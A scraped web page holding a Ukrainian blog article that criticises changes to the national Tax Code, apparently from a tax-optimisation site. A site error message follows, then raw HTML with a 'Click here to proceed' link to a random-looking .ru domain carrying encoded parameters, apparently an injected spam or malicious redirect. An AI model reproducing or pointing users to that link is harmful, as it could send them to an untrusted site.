Статьи

Аналізуємо зміни до Податкового кодексу. Чи це реформа?

Аналізуємо зміни до Податкового кодексу. Чи це реформа?На нашу думку це не нова податкова реформа, а лише перетасовка старої, та й то невдала.

Взяти наприклад скорочення податків з 22 до 9. Майже всі об’єднані. Прибрали здається лише один чи два податки. Але насправді справа не в скороченні податків, а в тім, щоб  вони були зрозумілими, тобто щоб всі розуміли, куди, скільки та за що вони  платять. При цьому кількість податків немає особливого значення.

Потрібно б було б приділити увагу й адмініструванню податків. Візьмемо наприклад нашумівший закон про електронне адміністрування ПДВ. Приймаючи його поспіхом там багато недоробок. І хоча запровадження ПДВ рахунків було відкладено до 1 лютого 2015 року, будемо сподіватися що мораторій на нього буде подовжено, хоч доти, доки не будуть усунені всі недоліки.

корисно: Внесены изменения в Таможенный кодекс

Що стосується  збільшення податку на доходи фізичних осіб, то зараз не найкращий момент для таких дій, оскільки зараз в країні і так складне становище.

Не найкращий час наразі і для зменшення Єдиного соціального внеску. Це могло б працювати якби в нас стрімко розвивалась економіка, а не тоді коли в країні криза та йде війна. Це лише призведе до скорочення доходів Пенсійного фонду, а це в свою чергу може призвести до скорочення пенсійних виплат та різного виду пільг для найменш захищених верств населення. Та при цьому мови про вихід з тіні та про зростання економіки не йдеться. А правильно було б замислитись над питанням не тільки як зекономити, але й як жити завтра.

Що таке реформа? В першу чергу це мало  відбуватися зі зміною баз оподаткування та зменшенням податків для бідних верств населення, а не навпаки як це зробили. Для пересічних громадян підвищили податки, а для багатих зменшили.

читайте також: Нововведення, які чекають в Новому податковому кодексі.

Залишається тільки сподіватися, що в ця так звана  нова податкова реформа все ж таки буде переглянута. Але це не є добре для країни. Оскільки при частій зміні законодавчої бази країна стає не привабливої для інвесторів, а значить притоку грошових коштів не слід очікувати, а кредити, що нам надають рано чи пізно доведеться повертати.

Прагнете оптимізувати оподаткування. Тоді наш сайт ТаксОптима розроблений спеціально для цілей оптимізації. Обирайте товари та послуги, а також розміщуйте свої.

Ключевые слова: 

податковый, кодекс, зміни, реформа
comments powered by HyperComments
Аналізуємо зміни до Податкового кодексу. Чи це реформа? | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=0sw%2FNaSoVCgAlM4Qv3BCDaL5qbBPtJ1zWQFkiJVfum1iobkm1fntCYwoh2GjC8ey9qOvo8pthPyZTpSKVVQ%2Bkp%2BJBiERj8wFpFloS7sTq7QsZIKNMj30c4kOSBLO95%2FoQlwXiFG%2FZY6hW2bgqkAXjxz%2B3S0JKdvYckyt6Wqhd5c%3D&t=nfrm">Click here to proceed</a>. </body>